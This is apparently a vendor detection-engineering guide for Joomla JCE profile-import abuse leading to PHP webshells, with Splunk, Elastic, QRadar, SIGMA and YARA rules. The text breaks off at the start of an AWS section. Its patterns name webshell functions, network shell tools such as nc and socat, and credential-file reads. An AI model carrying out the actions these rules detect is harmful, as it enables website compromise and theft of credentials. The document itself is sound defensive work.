Engineering Implementation Instructions

Map indexes and sourcetypes for web logs, WAF logs, reverse-proxy logs, EDR process logs, EDR file logs, DNS/proxy logs, FTP logs, hosting-control logs, and CMS audit or database change records.

Normalize joomla_site_id, virtual_host, backend_host, dest_host, uri_path, query_string, full_url, http_method, src_ip, x_forwarded_for, user_agent, status, jce_profile_id, jce_profile_name, file_path, file_action, process_name, parent_process_name, process_user, command_line, dest_domain, ftp_user, hosting_user, and _time.

Create lookups for Joomla/JCE assets, approved administrators, approved admin sources, approved scanners, approved hosting-provider sources, approved deployment users, approved maintenance windows, approved PHP paths, approved command patterns, approved egress destinations, and approved hosting-control users.

Create Splunk macros for local field normalization, Joomla/JCE asset scoping, web writable-path detection, maintenance-window evaluation, and approved-source suppression before alert-mode deployment.

Validate macro expansion, lookup return fields, lookup key names, lookup output fields, and lookup suppression behavior before enabling alert mode.

Validate that web logs retain query strings and that virtual hosts can join to backend hosts and endpoint hostnames.

Run in hunt mode against at least 14 to 30 days of history to tune scanners, patch validation, CMS administration, plugin updates, backup restores, migrations, developer uploads, vulnerability validation, and emergency cleanup.

Treat local index mapping, field normalization, lookup creation, macro creation, join validation, false-positive baseline, query performance testing, and SOC workflow routing as required local deployment work.

DRI Assessment

High where Splunk can join web, WAF, endpoint, DNS/proxy, FTP, hosting-control, and CMS telemetry by Joomla site, virtual host, backend host, source, file path, process, and destination.

DRI

9.0 / 10

TCR Assessment

High when JCE profile-import activity is followed by writable-path PHP access or endpoint file/process evidence. Highest when CMS profile state or hosting-control telemetry is available.

Operational TCR

8.6 / 10

Full-Telemetry TCR

9.5 / 10

Limitations

Effectiveness depends on query-string logging, asset mapping, and endpoint or file telemetry. Legitimate scanners, patch validation, admin testing, migrations, backup restores, or cleanup actions may require exceptions. Critical promotion requires stronger evidence than request telemetry alone.

Detection Query Pattern

Splunk SPL pattern requiring local lookup, macro, index, sourcetype, and field mapping:

search index=ENV_WEB_INDEX sourcetype IN (ENV_WEB_SOURCETYPES)

| `joomla_web_field_normalization`

| `joomla_jce_asset_scope`

| eval http_method=upper(coalesce(http_method,method))

| eval request_all=coalesce(full_url,url,request,"")

| eval query_all=coalesce(query_string,uri_query,url_query,"")

| where http_method="POST"

| where (

like(request_all,"%option=com_jce%")

OR like(query_all,"%option=com_jce%")

)

| where (

like(request_all,"%task=profiles.import%")

OR like(query_all,"%task=profiles.import%")

)

| lookup APPROVED_JOOMLA_ADMIN_SOURCES src_ip OUTPUT src_ip AS approved_admin_source

| lookup APPROVED_JOOMLA_SCANNERS src_ip OUTPUT src_ip AS approved_scanner_source

| lookup APPROVED_HOSTING_PROVIDER_SOURCES src_ip OUTPUT src_ip AS approved_hosting_provider_source

| where isnull(approved_admin_source)

AND isnull(approved_scanner_source)

AND isnull(approved_hosting_provider_source)

| eval normalized_site=coalesce(joomla_site_id,virtual_host,backend_host,dest_host)

| eval signal="suspicious_jce_profile_import"

| table _time normalized_site virtual_host backend_host dest_host src_ip x_forwarded_for user_agent uri_path query_string full_url http_method status signal

| append [

search index=ENV_WEB_INDEX sourcetype IN (ENV_WEB_SOURCETYPES)

| `joomla_web_field_normalization`

| `joomla_jce_asset_scope`

| eval http_method=upper(coalesce(http_method,method))

| eval uri_path=coalesce(uri_path,url_path,request_path,"")

| where http_method IN ("GET","POST")

| where match(uri_path,"(?i)(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)")

| eval normalized_site=coalesce(joomla_site_id,virtual_host,backend_host,dest_host)

| eval signal="writable_path_php_access"

| table _time normalized_site virtual_host backend_host dest_host src_ip x_forwarded_for user_agent uri_path http_method status signal

]

| append [

search index=ENV_EDR_FILE_INDEX sourcetype=ENV_EDR_FILE_SOURCETYPE

| `joomla_jce_host_scope`

| eval file_path=coalesce(file_path,path,target_file_path,"")

| where match(file_path,"(?i)(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.)")

| search file_action IN ("created","modified","renamed","write","written")

| lookup APPROVED_JOOMLA_DEPLOYMENT_USERS process_user OUTPUT process_user AS approved_deployment_user

| where isnull(approved_deployment_user)

| eval normalized_site=coalesce(joomla_site_id,host,dest_host)

| eval signal="unexpected_writable_php_file"

| table _time normalized_site host dest_host file_path file_action process_name process_user signal

]

| append [

search index=ENV_EDR_PROCESS_INDEX sourcetype=ENV_EDR_PROCESS_SOURCETYPE

| `joomla_jce_host_scope`

| eval process_name=coalesce(process_name,process,Image,process_exec)

| eval parent_process_name=coalesce(parent_process_name,parent_process,ParentImage,parent_name)

| eval command_line=coalesce(command_line,cmdline,process_command_line,CommandLine,"")

| eval process_user=coalesce(process_user,user,User)

| eval process_basename=lower(replace(process_name,"^.*[\\\\/]",""))

| eval parent_process_basename=lower(replace(parent_process_name,"^.*[\\\\/]",""))

| where (

process_user IN ("www-data","apache","nginx","nobody","litespeed")

OR parent_process_basename IN ("apache2","httpd","nginx","php-fpm","lsphp","php-cgi","cgi-fcgi","litespeed","openlitespeed")

)

| where process_basename IN ("sh","bash","dash","zsh","python","python3","perl","ruby","php","curl","wget","nc","ncat","socat","ssh","scp","tar","zip","7z","openssl")

| `joomla_approved_command_suppression`

| where isnull(approved_command) OR approved_command!="true"

| eval normalized_site=coalesce(joomla_site_id,host,dest_host)

| eval signal="web_server_service_execution"

| table _time normalized_site host dest_host process_user process_name parent_process_name command_line signal

]

| append [

search index=ENV_DNS_OR_PROXY_INDEX sourcetype IN (ENV_DNS_OR_PROXY_SOURCETYPES)

| `joomla_jce_egress_scope`

| eval dest_domain=coalesce(dest_domain,query,domain,url_domain,dns_query)

| eval src_host=coalesce(src_host,host,src,dest_host)

| lookup APPROVED_JOOMLA_EGRESS_DESTINATIONS dest_domain OUTPUT dest_domain AS approved_joomla_egress_destination

| lookup APPROVED_BUSINESS_DOMAINS dest_domain OUTPUT dest_domain AS approved_business_domain

| where isnull(approved_joomla_egress_destination)

AND isnull(approved_business_domain)

| eval normalized_site=coalesce(joomla_site_id,src_host,host)

| eval signal="rare_joomla_host_egress"

| table _time normalized_site src_host host dest_domain dest_ip signal

]

| bin _time span=60m

| stats

values(signal) AS signals

values(src_ip) AS src_ips

values(x_forwarded_for) AS x_forwarded_for

values(user_agent) AS user_agents

values(uri_path) AS uri_paths

values(query_string) AS query_strings

values(full_url) AS full_urls

values(status) AS statuses

values(file_path) AS file_paths

values(file_action) AS file_actions

values(process_name) AS processes

values(parent_process_name) AS parent_processes

values(command_line) AS command_lines

values(dest_domain) AS dest_domains

values(dest_ip) AS dest_ips

min(_time) AS first_seen

max(_time) AS last_seen

BY normalized_site _time

| eval has_import=if(mvfind(signals,"suspicious_jce_profile_import")>=0,1,0)

| eval has_execution_evidence=if(

mvfind(signals,"writable_path_php_access")>=0

OR mvfind(signals,"unexpected_writable_php_file")>=0

OR mvfind(signals,"web_server_service_execution")>=0

OR mvfind(signals,"rare_joomla_host_egress")>=0,

1,0

)

| where has_import=1 AND has_execution_evidence=1

| lookup APPROVED_JOOMLA_MAINTENANCE_WINDOWS normalized_site OUTPUT maintenance_window

| where isnull(maintenance_window) OR maintenance_window!="true"

| eval severity="high"

| eval cyberdax_rule="Joomla JCE Profile Import Followed by Writable Path PHP Execution Evidence"

| table first_seen last_seen normalized_site severity signals src_ips x_forwarded_for user_agents uri_paths query_strings statuses file_paths file_actions processes parent_processes command_lines dest_domains dest_ips cyberdax_rule

Elastic

Detection Viability Assessment

Production-deployable after local ECS, value-list, exception-list, and rule-type validation where Elastic has URI-preserving web logs, WAF or reverse-proxy events, endpoint process events, endpoint file events, DNS/proxy events, and enrichment linking Joomla sites to host identity. Exception logic must be implemented using Elastic exception lists, value lists, event filters, transforms, or equivalent local rule exceptions.

Rule

Joomla JCE Import to Writable PHP Execution Sequence

Rule Format

Elastic EQL production sequence with Elastic exception lists, value lists, transforms, and local ECS mapping.

Detection Purpose

Detect suspicious JCE profile-import activity followed by PHP-like file access, unexpected PHP file creation, web server service-context execution, sensitive file access, or rare outbound communication.

Detection Logic

Trigger when suspicious JCE profile-import activity is followed within 60 minutes by writable-path PHP access, unexpected PHP-like file creation, suspicious web server process execution, or rare outbound communication on the same Joomla host or mapped virtual host.

Assign high severity when the sequence occurs on a Joomla/JCE asset outside approved maintenance.

Promote to critical when the same host or site is tied to rogue JCE profile state, credential-file access, database dump activity, content tampering, FTP abuse, hosting-control activity, phishing or malware hosting, or confirmed webshell artifact discovery.

Required Telemetry

Reverse-proxy events.

WAF events.

Web access events.

Endpoint process events.

Endpoint file events.

DNS or proxy events.

Joomla/JCE asset enrichment.

Elastic value list for Joomla/JCE sites.

Elastic value list for approved Joomla administrator sources.

Elastic value list for approved scanners.

Elastic value list for approved hosting-provider sources.

Elastic value list for approved deployment users.

Elastic value list for approved egress destinations.

Elastic exception list for approved maintenance windows.

Elastic exception list for approved command patterns.

Engineering Implementation Instructions

Map event.dataset, url.path, url.query, url.full, http.request.method, http.response.status_code, source.ip, user_agent.original, host.name, joomla.site.id, joomla.virtual_host, process.name, process.command_line, process.parent.name, user.name, file.path, event.action, destination.domain, destination.ip, and @timestamp.

Create Elastic value lists for Joomla/JCE sites, approved administrator CIDRs, approved scanners, approved hosting-provider sources, approved deployment users, approved egress destinations, approved writable PHP paths, and approved Joomla maintenance sources.

Create Elastic exception rules for approved maintenance windows, approved deployment workflows, approved plugin updates, approved backup restores, approved vulnerability validation, and approved command patterns.

If Elastic cannot express a maintenance-window exception directly in EQL, implement maintenance-window suppression through rule exceptions, alert suppression, post-processing, or detection-engineering workflow logic.

Validate join keys between proxy/WAF events, endpoint events, file events, DNS/proxy events, and Joomla asset enrichment before alert mode.

Treat local ECS mapping, value-list creation, exception-list creation, transform configuration, join-key validation, alert severity tuning, historical baselining, and rule-action routing as required local deployment work.

DRI Assessment

High where Joomla web, endpoint, file, and network events share reliable host and site identity.

DRI

8.8 / 10

TCR Assessment

Strong when suspicious JCE profile-import activity is followed by writable-path PHP access or endpoint file/process telemetry. Weaker where endpoint telemetry is absent.

Operational TCR

8.3 / 10

Full-Telemetry TCR

9.3 / 10

Limitations

EQL sequence quality depends on reliable join keys. Query-string visibility is required for strong request detection. Legitimate scanner, patch validation, plugin update, migration, backup, or cleanup activity must be exceptioned. Critical promotion requires CMS profile, file, endpoint, hosting-control, or content-impact evidence.

Detection Query Pattern

Elastic EQL sequence pattern with value-list, exception-list, transform-backed enrichment, and local ECS mapping required:

sequence by joomla.site.id with maxspan=60m

[ any where

event.dataset in ("ENV_REVERSE_PROXY_DATASET","ENV_WAF_DATASET","ENV_WEB_ACCESS_DATASET") and

http.request.method == "POST" and

(

url.full like "*option=com_jce*" or

url.query like "*option=com_jce*"

) and

(

url.full like "*task=profiles.import*" or

url.query like "*task=profiles.import*"

) and

joomla.site.id in $JOOMLA_JCE_SITES and

not source.ip in $APPROVED_JOOMLA_ADMIN_SOURCES and

not source.ip in $APPROVED_JOOMLA_SCANNERS and

not source.ip in $APPROVED_HOSTING_PROVIDER_SOURCES

]

[ any where

(

event.dataset in ("ENV_REVERSE_PROXY_DATASET","ENV_WAF_DATASET","ENV_WEB_ACCESS_DATASET") and

http.request.method in ("GET","POST") and

joomla.site.id in $JOOMLA_JCE_SITES and

url.path regex~ """.*(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.).*"""

)

or

(

event.category == "file" and

joomla.site.id in $JOOMLA_JCE_SITES and

file.path regex~ """.*(/tmp/|/images/|/media/|/uploads/|/cache/|/templates/|/plugins/).*(\.php|\.phtml|\.phar|php\.).*""" and

event.action in ("open","read","modification","creation","rename","write") and

not user.name in $APPROVED_JOOMLA_DEPLOYMENT_USERS

)

or

(

event.category == "process" and

joomla.site.id in $JOOMLA_JCE_SITES and

(

user.name in $WEB_SERVER_SERVICE_USERS or

process.parent.name in ("apache2","httpd","nginx","php-fpm","lsphp","php-cgi","cgi-fcgi","litespeed","openlitespeed")

) and

process.name in ("sh","bash","dash","zsh","python","python3","perl","ruby","php","curl","wget","nc","ncat","socat","ssh","scp","tar","zip","7z","openssl") and

not process.command_line in $APPROVED_JOOMLA_COMMAND_PATTERNS

)

or

(

event.category == "network" and

joomla.site.id in $JOOMLA_JCE_SITES and

destination.domain != null and

destination.domain != "" and

not destination.domain in $APPROVED_JOOMLA_EGRESS_DESTINATIONS

)

]

until

[ any where

event.dataset == "ENV_CHANGE_CONTROL_DATASET" and

joomla.site.id in $JOOMLA_JCE_SITES and

event.action in ("approved_joomla_maintenance_start","approved_cleanup_start","approved_patch_validation_start")

]

QRadar

Detection Viability Assessment

Production-deployable where QRadar parses web, WAF, reverse-proxy, EDR, DNS/proxy, FTP, hosting-control, and Joomla CMS or database events into reliable custom properties. This should be implemented as building blocks with an offense rule. The AQL patterns below are validation searches for building-block logic, not standalone production alerts.

Rule

Joomla JCE Profile Import Abuse With PHP Execution Offense

Rule Format

QRadar building-block and offense-rule implementation pattern with AQL validation searches.

Detection Purpose

Correlate suspicious JCE profile-import activity with writable-path PHP access, unexpected PHP file activity, web server process execution, rare egress, FTP activity, hosting-control activity, or CMS profile-state changes.

Detection Logic

Trigger building block one when a Joomla/JCE asset receives suspicious POST activity involving option=com_jce and task=profiles.import.

Trigger building block two when web or WAF telemetry shows access to PHP-like files in writable Joomla paths.

Trigger building block three when endpoint, file, DNS/proxy, FTP, hosting-control, or CMS telemetry shows unexpected PHP file creation, web server service-context process execution, sensitive Joomla file access, rare egress, FTP changes, hosting-control changes, or rogue JCE profile state.

Create a high-severity offense when building block one and either building block two or building block three occur on the same Joomla site, virtual host, backend host, or mapped endpoint within 60 minutes.

Promote to critical when credential-file access, database dump activity, confirmed webshell artifact, phishing or malware hosting, hosted-content modification, multiple-site compromise, or hosting-control abuse occurs within 120 minutes.

Required Telemetry

Web access logs.

WAF logs.

Reverse-proxy logs.

Endpoint process logs.

Endpoint file logs.

DNS logs.

Proxy logs.

FTP logs where applicable.

Hosting-control logs where applicable.

Joomla CMS audit or database events where available.

Joomla/JCE asset reference set.

Approved administrator source reference set.

Approved scanner reference set.

Approved hosting-provider source reference set.

Approved maintenance-window reference set.

Approved egress-destination reference set.

Approved deployment-user reference set.

Engineering Implementation Instructions

Create custom properties for JOOMLA_SITE, VIRTUALHOST, BACKENDHOST, URLPATH, QUERYSTRING, FULLURL, HTTPMETHOD, SOURCEIP, XFORWARDEDFOR, USERAGENT, HTTPSTATUS, FILEPATH, FILEACTION, PROCESSNAME, COMMANDLINE, PROCESSUSER, DESTINATIONDOMAIN, DESTINATIONIP, FTPUSER, HOSTINGUSER, JCE_PROFILE_NAME, and JCE_PROFILE_ID.

Create reference sets for Joomla/JCE sites, approved administrators, approved admin sources, approved scanners, approved hosting-provider sources, approved maintenance windows, approved deployment users, approved PHP paths, approved command patterns, approved egress destinations, and approved hosting-control users.

Validate DSM parsing for each log source before enabling offense correlation.

Test each building block independently with historical data.

Treat DSM parsing, custom property creation, reference-set loading, building-block validation, offense magnitude, ownership routing, and suppression workflow as required local deployment work.

DRI Assessment

Moderate to high where QRadar custom properties and reference sets are reliable.

DRI

8.3 / 10

TCR Assessment

Strong when JCE profile-import activity, writable-path PHP access, and endpoint or file behavior can be joined by Joomla site or backend host. Lower when URI parsing or endpoint telemetry is incomplete.

Operational TCR

8.0 / 10

Full-Telemetry TCR

9.1 / 10

Limitations

QRadar effectiveness depends on DSM parsing quality, custom property accuracy, reference-set hygiene, and offense-rule correlation. Weak URI parsing or missing query strings will materially reduce confidence. Shared hosting without endpoint telemetry may require greater reliance on WAF, web logs, CMS profile review, file-system scanning, FTP logs, and hosting-control records.

Detection Query Pattern

QRadar building-block validation searches and offense logic:

BUILDING BLOCK ONE VALIDATION SEARCH:

SELECT QIDNAME(qid) AS event_name, JOOMLA_SITE, VIRTUALHOST, BACKENDHOST, URLPATH, QUERYSTRING, FULLURL, HTTPMETHOD, SOURCEIP, USERAGENT, HTTPSTATUS, starttime
FROM events
WHERE REFERENCESETCONTAINS('ENV_JOOMLA_JCE_SITES', JOOMLA_SITE)
AND HTTPMETHOD = 'POST'
AND (
LOWER(FULLURL) LIKE '%option=com_jce%'
OR LOWER(QUERYSTRING) LIKE '%option=com_jce%'
)
AND (
LOWER(FULLURL) LIKE '%task=profiles.import%'
OR LOWER(QUERYSTRING) LIKE '%task=profiles.import%'
)
AND NOT REFERENCESETCONTAINS('ENV_APPROVED_JOOMLA_ADMIN_SOURCES', SOURCEIP)
AND NOT REFERENCESETCONTAINS('ENV_APPROVED_JOOMLA_SCANNERS', SOURCEIP)
AND NOT REFERENCESETCONTAINS('ENV_APPROVED_HOSTING_PROVIDER_SOURCES', SOURCEIP)
LAST 60 MINUTES

BUILDING BLOCK TWO VALIDATION SEARCH:

SELECT QIDNAME(qid) AS event_name, JOOMLA_SITE, VIRTUALHOST, BACKENDHOST, URLPATH, HTTPMETHOD, SOURCEIP, USERAGENT, HTTPSTATUS, starttime
FROM events
WHERE REFERENCESETCONTAINS('ENV_JOOMLA_JCE_SITES', JOOMLA_SITE)
AND HTTPMETHOD IN ('GET','POST')
AND (
LOWER(URLPATH) LIKE '%/tmp/%'
OR LOWER(URLPATH) LIKE '%/images/%'
OR LOWER(URLPATH) LIKE '%/media/%'
OR LOWER(URLPATH) LIKE '%/uploads/%'
OR LOWER(URLPATH) LIKE '%/cache/%'
OR LOWER(URLPATH) LIKE '%/templates/%'
OR LOWER(URLPATH) LIKE '%/plugins/%'
)
AND (
LOWER(URLPATH) LIKE '%.php%'
OR LOWER(URLPATH) LIKE '%.phtml%'
OR LOWER(URLPATH) LIKE '%.phar%'
)
LAST 60 MINUTES

BUILDING BLOCK THREE VALIDATION SEARCH:

SELECT QIDNAME(qid) AS event_name, JOOMLA_SITE, BACKENDHOST, FILEPATH, FILEACTION, PROCESSNAME, COMMANDLINE, PROCESSUSER, DESTINATIONDOMAIN, DESTINATIONIP, FTPUSER, HOSTINGUSER, starttime
FROM events
WHERE REFERENCESETCONTAINS('ENV_JOOMLA_JCE_SITES', JOOMLA_SITE)
AND (
LOWER(FILEPATH) LIKE '%/configuration.php'
OR LOWER(FILEPATH) LIKE '%/tmp/%.php%'
OR LOWER(FILEPATH) LIKE '%/images/%.php%'
OR LOWER(FILEPATH) LIKE '%/media/%.php%'
OR LOWER(FILEPATH) LIKE '%/uploads/%.php%'
OR LOWER(FILEPATH) LIKE '%/cache/%.php%'
OR LOWER(FILEPATH) LIKE '%/templates/%.php%'
OR LOWER(FILEPATH) LIKE '%/plugins/%.php%'
OR PROCESSNAME IN ('sh','bash','dash','zsh','python','python3','perl','ruby','php','curl','wget','nc','ncat','ssh','scp','tar','zip','7z','openssl')
OR NOT REFERENCESETCONTAINS('ENV_APPROVED_JOOMLA_EGRESS_DESTINATIONS', DESTINATIONDOMAIN)
)
LAST 60 MINUTES

OFFENSE RULE CONDITION:

Building block one and either building block two or building block three occur on the same JOOMLA_SITE, VIRTUALHOST, or BACKENDHOST within 60 minutes outside approved maintenance.

CRITICAL PROMOTION CONDITION:

Credential-file access, database dump activity, confirmed webshell artifact, phishing or malware hosting, hosted-content modification, multiple-site compromise, FTP abuse, or hosting-control abuse occurs within 120 minutes of the high-severity offense.

SIGMA

Detection Viability Assessment

Production-deployable after conversion and local enrichment where endpoint process telemetry is collected from Joomla web servers. SIGMA is appropriate for portable host detection of suspicious web server service-context execution and should be promoted through the target SIEM only when joined with JCE web activity, file telemetry, CMS profile evidence, or webshell artifact evidence.

Rule

Joomla Web Server Suspicious Service Context Execution

Rule Format

SIGMA portable process-creation rule requiring target-SIEM conversion, Joomla host enrichment, and local exception logic.

Detection Purpose

Detect suspicious shell, scripting, transfer, archive, network, encoding, or credential-related process execution from the Joomla web server service context.

Detection Logic

Trigger when a web server parent process or web server service account spawns suspicious interpreters, transfer tools, remote-access tools, archive utilities, encoded commands, credential-file access, or webroot reconnaissance commands on a Joomla server.

Assign medium severity for standalone converted rule matches.

Promote to high severity in the target SIEM when correlated with JCE profile-import activity, writable-path PHP file creation, webshell access, sensitive Joomla file reads, rare egress, FTP activity, or hosting-control activity.

Required Telemetry

Process creation telemetry.

Command-line telemetry.

Parent process telemetry.

User field.

Host asset enrichment.

Joomla web server enrichment.

Web server service account enrichment.

Approved Joomla command-pattern exceptions.

Approved deployment-user exceptions.

Approved maintenance-window exceptions.

Engineering Implementation Instructions

Convert to the target SIEM.

Map Image, ParentImage, CommandLine, User, Hostname, CurrentDirectory, EventID, and process creation timestamp.

Add Joomla server asset enrichment after conversion.

Add web server service-account enrichment after conversion.

Add approved deployment, backup, migration, CMS update, plugin update, malware scanning, emergency cleanup, and vulnerability validation exceptions after conversion.

Do not deploy as high or critical severity without correlation logic in the target SIEM.

Treat target-SIEM conversion, field mapping, host enrichment, exception logic, and correlation-layer promotion as required local deployment work.

DRI Assessment

Medium to high after conversion and Joomla host enrichment.

DRI

8.1 / 10

TCR Assessment

Good for portable endpoint detection. Stronger when joined with JCE web activity, file telemetry, CMS profile evidence, DNS, proxy, WAF, or hosting-control telemetry.

Operational TCR

7.8 / 10

Full-Telemetry TCR

8.9 / 10

Limitations

Legitimate Joomla administration, deployments, plugin updates, backups, migrations, security scans, cleanup work, and hosting-provider maintenance may execute shells, scripts, transfer tools, archive tools, and PHP commands. Host scoping and approved workflow exceptions are required.

Detection Query Pattern

SIGMA event-rule template requiring local backend conversion, field mapping, enrichment, and SIEM-native correlation:

title: Joomla Web Server Service Execution and Writable PHP Artifact Indicators
id: 00000000-0000-4000-8000-joomla-jce-webshell-template
status: test
description: Detects web server service-context process execution, suspicious command activity, writable PHP artifact interaction, or sensitive Joomla file access that may indicate PHP webshell execution after Joomla JCE profile-import abuse.
references:

·        https://www.joomla.org/
author: CyberDax
date: 2026/06/17
logsource:
product: linux
category: process_creation
detection:
selection_web_parent:
ParentImage|contains:

o   '/apache2'

o   '/httpd'

o   '/nginx'

o   '/php-fpm'

o   '/lsphp'

o   '/php-cgi'

o   '/cgi-fcgi'

o   '/litespeed'

o   '/openlitespeed'
selection_web_user:
User|contains:

o   'www-data'

o   'apache'

o   'nginx'

o   'nobody'

o   'litespeed'
selection_suspicious_child:
Image|endswith:

o   '/sh'

o   '/bash'

o   '/dash'

o   '/zsh'

o   '/python'

o   '/python3'

o   '/perl'

o   '/ruby'

o   '/php'

o   '/curl'

o   '/wget'

o   '/nc'

o   '/ncat'

o   '/socat'

o   '/ssh'

o   '/scp'

o   '/tar'

o   '/zip'

o   '/7z'

o   '/openssl'
selection_command_indicators:
CommandLine|contains:

o   'configuration.php'

o   '/var/www/'

o   '/public_html/'

o   'mysqldump'

o   'base64'

o   'curl '

o   'wget '

o   'bash -c'

o   '/bin/sh -c'

o   '/tmp/'

o   '/images/'

o   '/media/'

o   '/uploads/'

o   '/cache/'

o   '/templates/'

o   '/plugins/'

o   '.php'

o   '.phtml'

o   '.phar'
condition: (selection_web_parent or selection_web_user) and (selection_suspicious_child or selection_command_indicators)
fields:

·        Image

·        ParentImage

·        CommandLine

·        User

·        host.name

·        event.category

·        event.type
falsepositives:

·        Approved Joomla plugin updates

·        Approved Joomla migrations

·        Approved backup or restore jobs

·        Approved vulnerability validation

·        Hosting-provider support activity

·        Emergency cleanup or incident response activity
level: high
tags:

·        attack.t1059

·        attack.t1105

·        attack.t1505.003

·        attack.t1190

YARA

Detection Viability Assessment

Production-usable for artifact triage and webroot scanning. YARA should not be treated as primary detection for JCE exploitation. It is viable for identifying suspicious PHP webshell-like artifacts, obfuscated PHP, credential-access logic, and command-execution functions in Joomla writable directories, templates, plugins, backups, forensic exports, and suspicious uploaded files.

Rule

Joomla Suspicious PHP Webshell or Credential Access Artifact

Rule Format

YARA artifact-scanning rule for Joomla webroots, writable directories, template directories, plugin directories, backup exports, and forensic images.

Detection Purpose

Detect suspicious PHP artifacts containing combinations of command execution, upload handling, credential-file access, obfuscation, outbound staging, or webshell control behavior.

Detection Logic

Trigger when files under Joomla webroot, writable directories, templates, plugins, cache, uploads, tmp, media, images, backups, or forensic exports contain combinations of PHP execution functions, shell invocation, request-controlled parameters, encoding behavior, credential-file references, or outbound staging logic.

Assign medium severity for standalone matches.

Promote to high severity when the matched file is newly created, modified outside maintenance, located in a directory that should not contain PHP, associated with suspicious JCE profile-import activity, accessed over HTTP, or owned by the web server service user.

Do not use this YARA rule as standalone proof of compromise. Treat it as an artifact-triage accelerator requiring path, timestamp, owner, HTTP access, CMS profile state, and telemetry correlation.

Required Telemetry

Joomla webroot file exports.

Writable directory file exports.

Template and plugin directory exports.

Backup and forensic exports.

File modification timestamps.

File owner and permission metadata.

Approved Joomla file inventory.

Approved template inventory.

Approved plugin inventory.

Approved maintenance-window records.

Forensic collection workflow.

Engineering Implementation Instructions

Use this rule in controlled scanning workflows and forensic triage, not as primary live exploit detection.

Scan Joomla webroots, tmp, images, media, uploads, cache, templates, plugins, extension directories, suspicious archives, backup exports, and forensic images.

Tune approved templates, known plugins, deployment artifacts, security tools, backup files, and legitimate PHP administration scripts before alerting.

Correlate YARA hits with JCE profile-import requests, HTTP access to the matched file, file modification time, owner, CMS profile state, endpoint telemetry, FTP logs, hosting-control logs, WAF logs, and web server access logs.

Treat file collection, scanner integration, path scoping, approved-script exceptions, timestamp review, owner validation, and triage routing as required local deployment work.

DRI Assessment

Moderate for artifact review and webshell triage. Low for live exploit detection.

DRI

7.2 / 10

TCR Assessment

Useful when matched artifacts are newly created, unapproved, web-accessed, located in non-executable directories, or correlated with suspicious JCE behavior. Not sufficient as standalone proof of compromise.

Operational TCR

6.9 / 10

Full-Telemetry TCR

8.4 / 10

Limitations

YARA cannot reliably detect network exploitation or runtime PHP execution without recoverable artifacts. Legitimate Joomla plugins, templates, backup tools, admin scripts, and security tools may contain PHP execution, HTTP, encoding, or file-management functions.

Detection Query Pattern

YARA file-content rule for PHP webshell-like artifact triage:

rule Joomla_PHP_Webshell_Like_Artifact_Upload_Execution_Encoding_Network
{
meta:
description = "Detects PHP webshell-like artifacts with request-driven execution, upload handling, encoding, file-management, or network retrieval behavior in Joomla webroot triage."
author = "CyberDax"
date = "2026-06-17"
scope = "Artifact triage and retrospective webroot scanning"
confidence = "Medium to High when correlated with Joomla writable path or JCE import activity"

strings:

    $php_1 = "<?php" ascii wide

    $php_2 = "<?=" ascii wide

    $req_1 = "$_GET[" ascii wide

    $req_2 = "$_POST[" ascii wide

    $req_3 = "$_REQUEST[" ascii wide

    $req_4 = "$_COOKIE[" ascii wide

    $req_5 = "$_FILES[" ascii wide

    $exec_1 = "eval(" ascii wide

    $exec_2 = "assert(" ascii wide

    $exec_3 = "system(" ascii wide

    $exec_4 = "exec(" ascii wide

    $exec_5 = "shell_exec(" ascii wide

    $exec_6 = "passthru(" ascii wide

    $exec_7 = "popen(" ascii wide

    $exec_8 = "proc_open(" ascii wide

    $exec_9 = "create_function(" ascii wide

    $shell_1 = "/bin/sh" ascii wide

    $shell_2 = "/bin/bash" ascii wide

    $shell_3 = "cmd.exe" ascii wide

    $shell_4 = "powershell" ascii wide

    $shell_5 = "bash -c" ascii wide

    $shell_6 = "sh -c" ascii wide

    $enc_1 = "base64_decode(" ascii wide

    $enc_2 = "gzinflate(" ascii wide

    $enc_3 = "gzuncompress(" ascii wide

    $enc_4 = "str_rot13(" ascii wide

    $enc_5 = "chr(" ascii wide

    $enc_6 = "pack(" ascii wide

    $enc_7 = "preg_replace(" ascii wide

    $enc_8 = "/e" ascii wide

    $upload_1 = "move_uploaded_file(" ascii wide

    $upload_2 = "is_uploaded_file(" ascii wide

    $upload_3 = "$_FILES" ascii wide

    $upload_4 = "multipart/form-data" ascii wide

    $file_1 = "file_put_contents(" ascii wide

    $file_2 = "fwrite(" ascii wide

    $file_3 = "fopen(" ascii wide

    $file_4 = "unlink(" ascii wide

    $file_5 = "chmod(" ascii wide

    $file_6 = "scandir(" ascii wide

    $file_7 = "readdir(" ascii wide

    $file_8 = "opendir(" ascii wide

    $net_1 = "curl_init(" ascii wide

    $net_2 = "fsockopen(" ascii wide

    $net_3 = "file_get_contents(\"http" ascii wide

    $net_4 = "stream_socket_client(" ascii wide

    $net_5 = "socket_create(" ascii wide

    $joomla_path_1 = "/images/" ascii wide

    $joomla_path_2 = "/media/" ascii wide

    $joomla_path_3 = "/cache/" ascii wide

    $joomla_path_4 = "/templates/" ascii wide

    $joomla_path_5 = "/plugins/" ascii wide

    $joomla_path_6 = "/administrator/" ascii wide

    $joomla_path_7 = "configuration.php" ascii wide

condition:

    any of ($php_*) and

    (

        (

            1 of ($req_*) and

            1 of ($exec_*) and

            (

                1 of ($shell_*) or

                1 of ($enc_*) or

                1 of ($upload_*) or

                1 of ($file_*) or

                1 of ($net_*)

            )

        )

        or

        (

            1 of ($upload_*) and

            1 of ($file_*) and

            (

                1 of ($exec_*) or

                1 of ($enc_*) or

                1 of ($net_*)

            )

        )

        or

        (

            1 of ($joomla_path_*) and

            2 of ($req_*, $exec_*, $shell_*, $enc_*, $upload_*, $file_*, $net_*)

        )

    )

}

AWS

Detection Viability Assessment

Production-deployable only when Joomla is hosted on AWS and AWS telemetry can be joined with application-layer logs, WAF or ALB logs, endpoint telemetry, asset mapping, and workload identity. AWS control-plane logs alone are not sufficient to detect JCE exploitation or PHP webshell execution.

Rule

AWS Hosted Joomla JCE Profile Import With PHP Access Egress or Hosting Impact

Rule Format

AWS Athena / CloudTrail / ALB / WAF / Route 53 / VPC Flow correlation pattern requiring Joomla asset and identity mapping.

Detection Purpose

Detect AWS-hosted Joomla JCE profile-import activity that aligns with PHP-like file access, rare egress, endpoint-confirmed execution, or suspicious AWS activity from a mapped Joomla workload.

Detection Logic

